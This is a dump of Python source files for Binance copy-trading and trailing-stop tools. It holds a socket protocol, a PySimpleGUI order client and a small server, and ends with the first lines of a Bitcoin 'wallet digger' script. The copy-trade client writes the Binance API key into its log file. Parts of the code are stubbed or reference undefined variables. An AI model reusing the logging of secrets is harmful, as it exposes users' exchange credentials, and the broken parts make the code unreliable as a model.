log(f"\tServer order id: [{dumpCmd.data.server_order_id}]")
else:
log("Unknow data structure for this cmd type.")
elif dumpCmd.cmd == CT_CMD_GETOPENORDERS:
if dumpCmd.cmdtype == CT_TYPE_RESPONSE:
log(f"\tReturn........: [{dumpCmd.data.ret}]")
log(f"\tReturn message: [{dumpCmd.data.retmsg}]")
elif dumpCmd.cmdtype == CT_TYPE_REQUEST:
def printOpenOrder(log, n, order):
log(f"\t{n}) Symbol..........: [{order['symbol']}]")
log(f"\tOrder id...........: [{order['ordid']}]")
log(f"\tSide...............: [{order['side']}]")
log(f"\tOrder type.........: [{order['ordtype']}]")
log(f"\tPrice..............: [{order['price']}]")
log(f"\tServer order id ref: [{order['server_order_id_ref']}]")
[printOpenOrder(log, n, i.element) for n, i in enumerate(dumpCmd.data.open_orders, 1)]
else:
log("Unknow data structure for this cmd type.")
else:
log("Unknow data structure for this cmd.")
'''
aaa = CT_PROTO(
_cmd = "aaa",
_fromto_from = "bbb",
_fromto_to = "ccc",
_timestamp = "ddd",
_cmdtype = "eee",
_resp_timestamp = "fff")
aaa.data = CT_PROTO_COPYTRADE_DATA( _symbol = "xxx", _ordid = "yyy", _side = "zzz", _ordtype = "qqq", _price = "www")
print(aaa.data)
'''
```
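A round-trip sketch of the protocol: build a copy-trade request, serialize it with `formatToNet`, and parse it back with `loadFromNet` (field values are illustrative):
```python
from BinanceCTProto import (CT_PROTO, CT_PROTO_COPYTRADE_DATA,
                            CT_CMD_COPYTRADE, CT_TYPE_REQUEST, dumpCmdToLog)
from BinanceCTUtil import getTimeStamp

req = CT_PROTO(_cmd=CT_CMD_COPYTRADE,
               _fromto_from='client1', _fromto_to='server',
               _timestamp=getTimeStamp(), _cmdtype=CT_TYPE_REQUEST,
               _data=CT_PROTO_COPYTRADE_DATA(_symbol='BTCUSDT', _side='BUY',
                                             _ordid='1', _ordtype='LIMIT',
                                             _qtd='0.01', _price='20000'))
ok, wire = req.formatToNet()          # JSON string ready for the socket
echo = CT_PROTO()
echo.loadFromNet(wire)                # reconstructs cmd, fromto and data
dumpCmdToLog(echo, print)             # any callable taking a str works as log
```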
#### File: a2gs/BinanceCopyTrade/BinanceCTUtil.py
```python
from datetime import datetime
def getTimeStamp()->str:
return(datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'))
```
#### File: a2gs/BinanceCopyTrade/CopyTrade_Manual.py
```python
from os import getenv, getpid
from sys import exit, argv, stderr
from textwrap import fill
import configparser
import logging
import PySimpleGUI as sg
from binance.client import Client
from binance.exceptions import BinanceAPIException, BinanceWithdrawException, BinanceRequestException
import BinanceCTDB
import BinanceCTUtil
import CopyTrade_Manual_Util
if len(argv) != 2:
print(f"Usage:\n\t{argv[0]} CFG_FILE.cfg")
exit(1)
con = None # Socket: signal source
ctmDB = None # Database handle
def safeExit(num : int = 0, msg : str = ""):
if ctmDB is not None:
ctmDB.DB.commit()
ctmDB.DB.quit()
if msg != "":
logging.info(msg)
logging.info(f"Exit with code [{num}]")
exit(num)
# --- CFG ---------------------------------
try:
cfgFile = configparser.ConfigParser()
cfgFile.read(argv[1])
ctm_name = cfgFile['GENERAL']['name']
ctm_log = cfgFile['GENERAL']['log']
ctm_enable = cfgFile['GENERAL']['copytrade_enable']
ctm_theme = cfgFile['GENERAL']['theme']
binance_apikey = cfgFile['BINANCE']['apikey']
binance_sekkey = cfgFile['BINANCE']['sekkey']
binance_recvwindow = cfgFile['BINANCE']['recvwindow']
signalSource_port = cfgFile['SIGNAL_SOURCE']['port']
signalSource_address = cfgFile['SIGNAL_SOURCE']['address']
db_engine = cfgFile['DB']['engine']
if db_engine == BinanceCTDB.CT_DB_TYPE_SQLITE:
db_file = cfgFile['DB']['file']
elif db_engine == BinanceCTDB.CT_DB_TYPE_POSTGRESQL:
db_user = cfgFile['DB']['user']
db_pass = cfgFile['DB']['pass']
db_port = cfgFile['DB']['port']
db_schema = cfgFile['DB']['schema']
else:
print("Undefined DB engine config!", file=stderr)
exit(1)
except Exception as e:
print(f"Invalid cfg file! [{e}]")
exit(1)
del cfgFile
# --- LOG ---------------------------------
try:
logging.basicConfig(filename = ctm_log,
level = logging.INFO,
format = '%(asctime)s %(message)s',
datefmt = '%Y%m%d %H%M%S')
except:
print(f"Erro open log file: [{pub_log}]", file=stderr)
exit(1)
# --- PRINT CFG ---------------------------
logging.info(f"Starting at: [{BinanceCTUtil.getTimeStamp()}] PID: [{getpid()}]")
logging.info('Configuration:')
logging.info(f"Name.....................: [{ctm_name}]")
logging.info(f"Copy Trade enable........? [{ctm_enable}]")
logging.info(f"Theme....................: [{ctm_theme}]")
logging.info(f"Signal Send port.........: [{signalSource_port}]")
logging.info(f"Signal Send address......: [{signalSource_address}]")
logging.info(f"Binance API..............: [{binance_apikey}]")
logging.info(f"Binance Recv windows.....: [{binance_recvwindow}]")
logging.info(f"DB Engine................: [{db_engine}]")
if db_engine == BinanceCTDB.CT_DB_TYPE_SQLITE:
logging.info(f"DB File..................: [{db_file}]")
elif db_engine == BinanceCTDB.CT_DB_TYPE_POSTGRESQL:
logging.info(f"DB User..................: [{db_user}]")
logging.info(f"DB Port..................: [{db_port}]")
logging.info(f"DB Schema................: [{db_schema}]")
# --- BINANCE CONNECTION ------------------
try:
client = Client(binance_apikey, binance_sekkey, {"verify": True, "timeout": 20})
except BinanceAPIException as e:
safeExit(1, f"Binance API exception: [{e.status_code} - {e.message}]")
except BinanceRequestException as e:
safeExit(1, f"Binance request exception: [{e.status_code} - {e.message}]")
except BinanceWithdrawException as e:
safeExit(1, f"Binance withdraw exception: [{e.status_code} - {e.message}]")
except Exception as e:
safeExit(1, f"Binance connection error: {e}")
# --- DATABASE ----------------------------
ctmDB = BinanceCTDB.CT_DB(_engine = db_engine, _sqliteDBFile = db_file)
ret, retmsg = ctmDB.DB.connect()
if ret == False:
logging.info(f"Error opening database: [{retmsg}]")
exit(1)
ret, retmsg = ctmDB.DB.createTablesIfNotExist()
if ret == False:
safeExit(1, f"Error creating tables: [{retmsg}]")
# -----------------------------------------
if ctm_enable == "YES":
CopyTrade_Manual_Util.setCopyTradeEnable(True)
else:
CopyTrade_Manual_Util.setCopyTradeEnable(False)
logging.info("Copy trade disabled by config file")
CopyTrade_Manual_Util.setSrvSendInformation(signalSource_address, int(signalSource_port), ctm_name)
STATUSBAR_WRAP = 100
menu = [
[ '&Menu', ['Info', 'Config', '---', 'Read cfg', 'Write cfg', 'Create Empty Cfg file', '---', 'Exit']],
[ '&Account', ['Infos acc', 'Taxes']],
[ '&Order', ['BUY', ['B Spot Market', 'B Spot Limit','B Spot Stop Limit', '!B Spot OCO', '---', 'B Margin Market', 'B Margin Limit', 'B Margin Stop Limit', '!B Margin OCO'],
'SELL', ['S Spot Market', 'S Spot Limit','S Spot Stop Limit', '!S Spot OCO', '---', 'S Margin Market', 'S Margin Limit', 'S Margin Stop Limit', '!S Margin OCO'], '!CANCEL', 'LIST or DELETE Open', '!LIST All']],
[ '&Binance', ['Infos binance', 'Assets', 'Symbols']]
]
layout = [
[sg.Menu(menu)],
[sg.Button('Spot Market' , key='BTTN_BSM' , button_color=('black','green'), size=(30,1)), sg.Button('Spot Market' , key='BTTN_SSM' , button_color=('black', 'red'), size=(30,1))],
[sg.Button('Spot Limit' , key='BTTN_BSL' , button_color=('black','green'), size=(30,1)), sg.Button('Spot Limit' , key='BTTN_SSL' , button_color=('black','red'), size=(30,1))],
[sg.Button('Spot Stop Limit' , key='BTTN_BSSL', button_color=('black','green'), size=(30,1)), sg.Button('Spot Stop Limit' , key='BTTN_SSSL', button_color=('black','red'), size=(30,1))],
[sg.Button('Spot OCO' , disabled=True, key='BTTN_BSO' , button_color=('black','green'), size=(30,1)), sg.Button('Spot OCO' , disabled=True, key='BTTN_SSO' , button_color=('black','red'), size=(30,1))],
[sg.Button('Margin Market' , key='BTTN_BMM' , button_color=('black','green'), size=(30,1)), sg.Button('Margin Market' , key='BTTN_SMM' , button_color=('black','red'), size=(30,1))],
[sg.Button('Margin Limit' , key='BTTN_BML' , button_color=('black','green'), size=(30,1)), sg.Button('Margin Limit' , key='BTTN_SML' , button_color=('black','red'), size=(30,1))],
[sg.Button('Margin Stop Limit', key='B<KEY>', button_color=('black','green'), size=(30,1)), sg.Button('Margin Stop Limit', key='BTTN_SMSL', button_color=('black','red'), size=(30,1))],
[sg.Button('Margin OCO' , disabled=True, key='BTTN_BMO' , button_color=('black','green'), size=(30,1)), sg.Button('Margin OCO' , disabled=True, key='BTTN_SMO' , button_color=('black','red'), size=(30,1))],
[sg.Button('LIST or DELETE Open Orders', key='BTTN_LDOO')],
[sg.Button('CLOSE', key='BTTN_CLOSE')],
[sg.StatusBar('Last msg: Initialized', key='LASTMSG', size=(250, 3), justification='left')],
]
sg.theme(ctm_theme)
#sg.set_options(suppress_raise_key_errors=False, suppress_error_popups=False, suppress_key_guessing=False)
window = sg.Window('Binance Status GUI', layout, size = (600, 400)).Finalize()
while True:
event, values = window.read() #timeout=1000)
if event == sg.WIN_CLOSED or event == 'Exit' or event == 'BTTN_CLOSE':
break
elif event == "Infos":
sg.popup('INFOS')
elif event == 'Info':
pass
elif event == 'Config':
pass
elif event == 'Infos acc':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.printAccountInfo(client)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'Taxes':
pass
# 'B Spot Market'
elif event == 'BTTN_BSM':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.BS_SpotMarket(client, 'green', 'Buy Spot Market', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
# 'B Spot Limit'
elif event == 'BTTN_BSL':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.BS_SpotLimit(client, 'green', 'Buy Spot Limit', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
# 'B Spot Stop Limit'
elif event == 'BTTN_BSSL':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.BS_SpotStopLimit(client, 'green', 'Buy Spot Stop Limit', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
# 'B Spot OCO'
elif event == 'BTTN_BSO':
pass
# 'B Margin Market'
elif event == 'BTTN_BMM':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.BS_MarginMarket(client, 'green', 'Buy Margin Market', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
# 'B Margin Limit'
elif event == 'BTTN_BML':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.BS_MarginLimit(client, 'green', 'Buy Margin Limit', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
# 'B Margin Stop Limit'
elif event == 'BTTN_BMSL':
window.Hide()
ret, retMsg = CopyTrade_Manual_Util.BS_MarginStopLimit(client, 'green', 'Buy Margin Stop Limit', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
# 'B Margin OCO'
elif event == 'BTTN_BMO':
pass
# 'S Spot Market'
elif event == 'BTTN_SSM':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.BS_SpotMarket(client, 'red', 'Sell Spot Market', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
# 'S Spot Limit'
elif event == 'BTTN_SSL':
window.Hide()
ret, retMsg = CopyTrade_Manual_Util.BS_SpotLimit(client, 'red', 'Sell Spot Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
# 'S Spot Stop Limit'
elif event == 'BTTN_SSSL':
window.Hide()
ret, retMsg = CopyTrade_Manual_Util.BS_SpotStopLimit(client, 'red', 'Sell Spot Stop Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
# 'S Spot OCO'
elif event == 'BTTN_SSO':
pass
# 'S Margin Market'
elif event == 'BTTN_SMM':
window.Hide()
ret, retMsg = CopyTrade_Manual_Util.BS_MarginMarket(client, 'red', 'Sell Margin Market', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
# 'S Margin Limit'
elif event == 'BTTN_SML':
window.Hide()
ret, retMsg = CopyTrade_Manual_Util.BS_MarginLimit(client, 'red', 'Sell Margin Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
# 'S Margin Stop Limit'
elif event == 'BTTN_SMSL':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.BS_MarginStopLimit(client, 'red', 'Sell Margin Stop Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
# 'S Margin OCO'
elif event == 'BTTN_SMO':
pass
elif event == 'CANCEL':
pass
# 'LIST or DELETE Open Orders'
elif event == 'BTTN_LDOO':
window.Hide()
ret, msgRet = CopyTrade_Manual_Util.ListOpenOrders(client)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'LIST All':
pass
elif event == 'Infos binance':
pass
elif event == 'Assets':
pass
elif event == 'Symbols':
pass
window.close()
safeExit(0)
```
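The script expects an INI file with the sections read above. A sketch that writes one follows; all values are placeholders, and the DB `engine` string must equal `BinanceCTDB.CT_DB_TYPE_SQLITE`, whose literal value is not shown in this dump:
```python
import configparser

cfg = configparser.ConfigParser()
cfg['GENERAL'] = {'name': 'manual-trader', 'log': 'ctm.log',
                  'copytrade_enable': 'YES', 'theme': 'DarkBlue3'}
cfg['BINANCE'] = {'apikey': 'YOUR_API_KEY', 'sekkey': 'YOUR_SECRET_KEY',
                  'recvwindow': '5000'}
cfg['SIGNAL_SOURCE'] = {'address': '127.0.0.1', 'port': '5050'}
cfg['DB'] = {'engine': 'SQLITE',   # must match BinanceCTDB.CT_DB_TYPE_SQLITE
             'file': 'copytrade.db'}
with open('copytrade_manual.cfg', 'w') as f:
    cfg.write(f)
```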
#### File: a2gs/BinanceCopyTrade/SrvDataClient.py
```python
from BinanceCTUtil import getTimeStamp
from sys import argv, exit, stderr
from os import getpid
from signal import signal, SIGILL, SIGTRAP, SIGINT, SIGHUP, SIGTERM, SIGSEGV, SIGUSR1
import BinanceCTDB
import socket
import envelop_sendRecv
import configparser
import logging
if len(argv) != 2:
print(f"Usage:\n\t{argv[0]} CFG_FILE.cfg")
exit(1)
con = None # Socket: signal source
srvDCDB = None # Database handle
def safeExit(num : int = 0, msg : str = ""):
if srvDCDB is not None:
srvDCDB.DB.commit()
srvDCDB.DB.quit()
if msg != "":
logging.debug(msg)
logging.debug(f"Exit with code [{num}]")
exit(num)
def sigHandler(signum, frame):
if signum == SIGUSR1:
logging.info('Signal SIGUSR1 received! Normal shutdown returning [0] to shell.\n')
logging.shutdown()
exit(0)
else:
logging.info(f'Signal {signum} received! Return [1] to shell.\n')
logging.shutdown()
exit(1)
signal(SIGILL , sigHandler)
signal(SIGTRAP, sigHandler)
signal(SIGINT , sigHandler)
signal(SIGHUP , sigHandler)
signal(SIGTERM, sigHandler)
signal(SIGSEGV, sigHandler)
signal(SIGUSR1, sigHandler)
# --- CFG ---------------------------------
try:
cfgFile = configparser.ConfigParser()
cfgFile.read(argv[1])
srvDataClient_name = cfgFile['GENERAL']['name']
srvDataClient_log = cfgFile['GENERAL']['log']
signalSrvDataClient_port = cfgFile['SIGNAL_SOURCE']['port']
signalSrvDataClient_address = cfgFile['SIGNAL_SOURCE']['address']
signalSrvDataClient_maxconn = cfgFile['SIGNAL_SOURCE']['maxconnections']
db_engine = cfgFile['DB']['engine']
if db_engine == BinanceCTDB.CT_DB_TYPE_SQLITE:
db_file = cfgFile['DB']['file']
elif db_engine == BinanceCTDB.CT_DB_TYPE_POSTGRESQL:
db_user = cfgFile['DB']['user']
db_pass = cfgFile['DB']['pass']
db_port = cfgFile['DB']['port']
db_schema = cfgFile['DB']['schema']
else:
print("Undefined DB engine config!", file=stderr)
exit(1)
except Exception as e:
print(f"Invalid cfg file! [{e}]")
exit(1)
del cfgFile
# --- LOG ---------------------------------
try:
logging.basicConfig(filename = srvDataClient_log,
level = logging.DEBUG,
format = '%(asctime)s %(message)s',
datefmt = '%Y%m%d %H%M%S')
except:
print(f"Erro open log file: [{pub_log}]", file=stderr)
exit(1)
# --- PRINT CFG ---------------------------
logging.info(f"Starting at: [{getTimeStamp()}] PID: [{getpid()}]")
logging.info('Configuration:')
logging.info(f"Name...................: [{srvDataClient_name}]")
logging.info(f"Address................: [{signalSrvDataClient_address}]")
logging.info(f"Port...................: [{signalSrvDataClient_port}]")
logging.info(f"Signal Source Port.....: [{signalSrvDataClient_port }]")
logging.info(f"Signal Source Address..: [{signalSrvDataClient_address }]")
logging.info(f"Signal Source Max Conns: [{signalSrvDataClient_maxconn }]")
logging.info(f"DB Engine..............: [{db_engine}]")
if db_engine == BinanceCTDB.CT_DB_TYPE_SQLITE:
logging.info(f"DB File................: [{db_file}]")
elif db_engine == BinanceCTDB.CT_DB_TYPE_POSTGRESQL:
logging.info(f"DB User................: [{db_user}]")
logging.info(f"DB Port................: [{db_port}]")
logging.info(f"DB Schema..............: [{db_schema}]")
# --- SOCKET ------------------------------
con = envelop_sendRecv.connection()
ret, retmsg = con.serverLoad(socket.AF_INET, socket.SOCK_STREAM)
if ret == False:
safeExit(1, f"Erro loading server: [{retmsg}]!")
ret, retmsg = con.sockOpts(socket.SO_REUSEADDR)
if ret == False:
safeExit(1, f"Erro sockOpts server: [{retmsg}]!")
ret, retmsg = con.serverBindListen(int(signalSrvDataClient_port), int(signalSrvDataClient_maxconn))
if ret == False:
safeExit(1, f"Erro binding server: [{retmsg}]!")
# --- DATABASE ----------------------------
srvDCDB = BinanceCTDB.CT_DB(_engine = db_engine, _sqliteDBFile = db_file)
ret, retmsg = srvDCDB.DB.connect()
if ret == False:
logging.info(f"Error opening database: [{retmsg}]")
exit(1)
ret, retmsg = srvDCDB.DB.createTablesIfNotExist()
if ret == False:
safeExit(1, f"Error creating tables: [{retmsg}]")
# -----------------------------------------
while True:
logging.info("Wating connection...")
ret, msgret, client = con.serverAccept()
if ret == False:
logging.info(f'Connection error: [{msgret}].')
exit(1)
ret, retmsg, msgRecv = con.recvMsg()
if ret == False:
logging.info(f"Error: [{retmsg}]")
exit(1)
logging.info(f'Connection from [{client}]. Msg: [{msgRecv}]')
respRet = "Ok"
con.sendMsg(respRet, len(respRet))
con.endClient()
logging.info("End Srv Data Client")
con.endServer()
``` |
{
"source": "a2gs/Binance_TrailingStop",
"score": 2
} |
#### File: a2gs/Binance_TrailingStop/TrailingStop.py
```python
from sys import exit, argv
from time import strftime, gmtime
from os import getenv
from binance.client import Client
from binance.exceptions import BinanceAPIException, BinanceWithdrawException, BinanceRequestException
class order_c:
_symb = str("")
_side = str("")
_qtd = int(0)
_priceLimit = float(0.0)
_priceTrigger = float(0.0)
_orderId = str("")
_type = int(0)
def __init__(self,
Psymb : str = "",
Pside : str = "",
Pqtd : int = 0,
PpriceLimit : float = 0.0,
PpriceTrigger : float = 0.0,
PorderId : str = "",
Ptype : str = ""):
self.symb = Psymb
self.side = Pside
self.qtd = Pqtd
self.priceLimit = PpriceLimit
self.priceTrigger = PpriceTrigger
self.orderId = PorderId
self.type = Ptype # the 'type' property setter maps the string through binanceOrderType
def print(self):
print(f"Symbol.......: [{self.symb}]")
print(f"Side.........: [{self.side}]")
print(f"Qtd..........: [{self.qtd}]")
print(f"Price Limit..: [{self.priceLimit}]")
print(f"Price Trigger: [{self.priceTrigger}]")
print(f"Id...........: [{self.orderId}]")
print(f"Type.........: [{self.type}]")
@property
def symb(self) -> str:
return self._symb
@symb.setter
def symb(self, value : str = ""):
self._symb = value
@property
def side(self) -> str:
return self._side
@side.setter
def side(self, value : str = ""):
self._side = value
@property
def qtd(self):
return self._qtd
@qtd.setter
def qtd(self, value : int = 0):
self._qtd = value
@property
def priceLimit(self):
return self._priceLimit
@priceLimit.setter
def priceLimit(self, value : float = 0.0):
self._priceLimit = value
@property
def priceTrigger(self):
return self._priceTrigger
@priceTrigger.setter
def priceTrigger(self, value : float = 0.0):
self._priceTrigger = value
@property
def orderId(self):
return self._orderId
@orderId.setter
def orderId(self, value : str = ""):
self._orderId = value
@property
def type(self):
return self._type
@type.setter
def type(self, value : str = ""):
try:
self._type = binanceOrderType[value]
except:
self._type = ""
binanceOrderType = {
'LIMIT' : Client.ORDER_TYPE_LIMIT,
'LIMIT_MAKER' : Client.ORDER_TYPE_LIMIT_MAKER,
#'MARKET' : Client.ORDER_TYPE_MARKET,
'STOP_LOSS' : Client.ORDER_TYPE_STOP_LOSS,
'STOP_LOSS_LIMIT' : Client.ORDER_TYPE_STOP_LOSS_LIMIT,
'TAKE_PROFIT' : Client.ORDER_TYPE_TAKE_PROFIT,
'TAKE_PROFIT_LIMIT' : Client.ORDER_TYPE_TAKE_PROFIT_LIMIT
}
def printHelp():
print("0) ENVIRONMENT VARIABLES:")
print("BINANCE_APIKEY - ")
print("BINANCE_SEKKEY - ")
print("")
print("1) PLACE A NEW ORDER AND TRAILING STOP (-n):")
print("./TrailingStop -n SYMBOL SIDE PRICE_LIMIT QTD_LIMIT PRICE_REFRESH_SECONDS TRIGGER_PERCENTAGE(Stop price) NEW_POSITION_PERCENTAGE(Limit price)")
print("SYMBOL")
print("SIDE - SELL / BUY")
print("PRICE_LIMIT")
print("QTD_LIMIT")
print("PRICE_REFRESH_SECONDS")
print("TRIGGER_PERCENTAGE - How much distance from placed order to current price to replace the order")
print("NEW_POSITION_PERCENTAGE - How much from current price to replace the new order")
print("")
print("./TrailingStop -n BTCUSDT BUY 10000 2 3 10 4")
print("")
print("2) TRAILING STOP FOR AN EXISTING ORDER:")
print("./TrailingStop -f ORDERE_ID PRICE_REFRESH_SECONDS TRIGGER_PERCENTAGE NEW_POSITION_PERCENTAGE")
print("")
print("3) LIST ALL ORDERS INFORMATION:")
print("./TrailingStop -i")
print("")
print("4) CANCEL AN ORDER:")
print("./TrailingStop -c ORDER_SYMBOL ORDER_ID")
print("")
print("5) SYMBOL LAST PRICE:")
print("./TrailingStop -p SYMBOL")
def milliTime(t):
return(strftime(f"%d/%b/%Y %a %H:%M:%S.{t % 1000}", gmtime(t / 1000)))
def printOrders(spotOrder):
print(f"Symbol: [{spotOrder['symbol']}]")
print(f"\tOrder Id: [{spotOrder['orderId']}] | Time: [{milliTime(spotOrder['time'])}]")
print(f"\tSide: [{spotOrder['side']}] | Type: [{spotOrder['type']}]")
print(f"\tQtd: [{spotOrder['origQty']}] | Qtd executed: [{spotOrder['executedQty']}]")
print(f"\tPrice (limit): [{spotOrder['price']}] | Stop price (trigger): [{spotOrder['stopPrice']}]")
def listOpenOrders(client) -> bool:
try:
openOrders = client.get_open_orders() #recvWindow
except BinanceRequestException as e:
print(f"Error at client.get_open_orders() BinanceRequestException: [{e.status_code} - {e.message}]")
return False
except BinanceAPIException as e:
print(f"Error at client.get_open_orders() BinanceAPIException: [{e.status_code} - {e.message}]")
return False
except Exception as e:
print(f"Error at client.get_open_orders(): {e}")
return False
print(f"Spot open orders ({len(openOrders)}):")
[printOrders(i) for i in openOrders]
print("")
try:
openOrders = client.get_open_margin_orders()
except BinanceRequestException as e:
print(f"Error at client.get_open_margin_orders() BinanceRequestException: [{e.status_code} - {e.message}]")
return False
except BinanceAPIException as e:
print(f"Error at client.get_open_margin_orders() BinanceAPIException: [{e.status_code} - {e.message}]")
return False
except Exception as e:
print(f"Error at client.get_open_margin_orders(): {e}")
return False
print(f"Margin open orders ({len(openOrders)}):")
[printOrders(i) for i in openOrders]
return True
def cancelOrder(client, idOrder : int, symb : str) -> bool:
try:
cancOrd = client.cancel_order(symbol = symb, orderId = idOrder)
except BinanceRequestException as e:
print(f"Error at client.cancel_order() BinanceRequestException: [{e.status_code} - {e.message}]")
return False
except BinanceAPIException as e:
print(f"Error at client.cancel_order() BinanceAPIException: [{e.status_code} - {e.message}]")
return False
except Exception as e:
print(f"Error at client.cancel_order(): {e}")
return False
print("Canceled order:")
print(f"Symbol: [{cancOrd['symbol']}]")
print(f"\tOrder Id.............: [{cancOrd['orderId']}]")
print(f"\tPrice................: [{cancOrd['price']}]")
print(f"\tOriginal Qtd.........: [{cancOrd['origQty']}]")
print(f"\tExecuted Qty.........: [{cancOrd['executedQty']}]")
print(f"\tCummulative Quote Qty: [{cancOrd['cummulativeQuoteQty']}]")
print(f"\tStatus...............: [{cancOrd['status']}]")
print(f"\tType.................: [{cancOrd['type']}]")
print(f"\tSide.................: [{cancOrd['side']}]")
return True
def TS(client, order : order_c) -> bool:
#order.print()
return True
#def getOrderInfo(client, symb : str, orderid : int) -> (bool, order_c):
def getOrderInfo(client, orderid : int) -> (bool, order_c):
try:
# o = client.get_all_orders(symbol = "*", orderId = orderid, limit = 1)
o = client.get_open_margin_orders() #recvWindow
except BinanceAPIException as e:
print(f"Error at client.get_open_margin_orders() BinanceAPIException: [{e.status_code} - {e.message}]")
return (False, None)
except BinanceRequestException as e:
print(f"Error at client.get_open_margin_orders() BinanceRequestException: [{e.status_code} - {e.message}]")
return (False, None)
except Exception as e:
print(f"Error at client.get_open_margin_orders(): {e}")
return (False, None)
oa = next((item for item in o if item['orderId'] == orderid), None)
if oa is None:
return (False, None)
# keyword arguments avoid misaligning the positional parameters of order_c.__init__
order = order_c(Psymb = oa['symbol'], Pside = oa['side'], Pqtd = oa['origQty'], PpriceLimit = oa['price'], PpriceTrigger = oa['stopPrice'], PorderId = oa['orderId'], Ptype = oa['type'])
return (True, order)
def TS_createOrder(client, symb, side, priceLimit, qtdLimit, priceRefreshSeconds, triggerPercent, newPositPercent) -> bool:
order = order_c()
if TS(client, order) == False:
return False
def TS_existingOrder(client, orderId : int, priceRefreshSeconds, triggerPercent, newPositPercent) -> bool:
(retORderInfo, order) = getOrderInfo(client, orderId)
order.print()
if TS(client, order) == False:
return False
def printPrice(client, symb : str) -> bool:
try:
pa = client.get_ticker(symbol = symb)
except BinanceAPIException as e:
print(f"Error at client.get_ticker() BinanceAPIException: [{e.status_code} - {e.message}]")
return False
except BinanceRequestException as e:
print(f"Error at client.get_ticker() BinanceRequestException: [{e.status_code} - {e.message}]")
return False
except Exception as e:
print(f"Error at client.get_ticker(): {e}")
return False
print(f"Symbol: [{symb}] | Price.: [{pa['lastPrice']}]")
return True
# APIs:
# order_limit_sell()
binanceAPIKey = getenv("BINANCE_APIKEY", "NOTDEF_APIKEY")
if binanceAPIKey == "NOTDEF_APIKEY":
print("Environment variable BINANCE_APIKEY not defined!")
exit(1)
binanceSEKKey = getenv("BINANCE_SEKKEY", "NOTDEF_APIKEY")
if binanceSEKKey == "NOTDEF_APIKEY":
print("Environment variable BINANCE_SEKKEY not defined!")
exit(1)
try:
client = Client(binanceAPIKey, binanceSEKKey, {"verify": True, "timeout": 20})
except BinanceAPIException as e:
print(f"Binance API exception: [{e.status_code} - {e.message}]")
exit(1)
except BinanceRequestException as e:
print(f"Binance request exception: [{e.status_code} - {e.message}]")
exit(1)
except BinanceWithdrawException as e:
print(f"Binance withdraw exception: [{e.status_code} - {e.message}]")
exit(1)
except Exception as e:
print("Binance connection error: {e}")
exit(1)
if len(argv) >= 2:
if argv[1] == '-n' and len(argv) == 9:
TS_createOrder(client, argv[2], argv[3], argv[4], argv[5], argv[6], argv[7], argv[8])
elif argv[1] == '-f' and len(argv) == 6:
TS_existingOrder(client, int(argv[2]), argv[3], argv[4], argv[5])
elif argv[1] == '-i' and len(argv) == 2:
listOpenOrders(client)
elif argv[1] == '-c' and len(argv) == 4:
cancelOrder(client, int(argv[2]), argv[3])
elif argv[1] == '-p' and len(argv) == 3:
printPrice(client, argv[2])
else:
print("Parameters error.")
printHelp()
else:
printHelp()
``` |
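`TS()` above is a stub. A sketch of the trailing logic it might implement follows: poll the last price, and once it drifts more than TRIGGER_PERCENTAGE away from the working stop, cancel and re-place the order NEW_POSITION_PERCENTAGE from the current price. The replacement call, the stop-limit order type, and the assumption that the order fields are numeric are mine, not the author's confirmed design:
```python
from time import sleep

def trailing_loop(client, order, refresh_secs, trigger_pct, new_posit_pct):
    while True:
        last = float(client.get_ticker(symbol=order.symb)['lastPrice'])
        # percentage distance between current price and the working stop trigger
        drift = abs(last - order.priceTrigger) / last * 100.0
        if drift >= trigger_pct:
            client.cancel_order(symbol=order.symb, orderId=order.orderId)
            # re-arm the stop new_posit_pct away from the current price
            sign = -1.0 if order.side == 'SELL' else 1.0
            order.priceTrigger = last * (1.0 + sign * new_posit_pct / 100.0)
            new = client.create_order(
                symbol=order.symb, side=order.side,
                type='STOP_LOSS_LIMIT', timeInForce='GTC',
                quantity=order.qtd, stopPrice=f'{order.priceTrigger:.8f}',
                price=f'{order.priceTrigger:.8f}')
            order.orderId = new['orderId']
        sleep(refresh_secs)
```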
{
"source": "a2gs/BTCWalletDigger",
"score": 3
} |
#### File: a2gs/BTCWalletDigger/digger.py
```python
from sys import argv, exit
from bitcoinlib.wallets import HDWallet, wallet_delete
from bitcoinlib.mnemonic import Mnemonic
def main(argv):
if (len(argv) == 2 and argv[1] == '-h') or (len(argv) == 1):
print('Usage:')
print(f'{argv[0]} -h\n\tHelp')
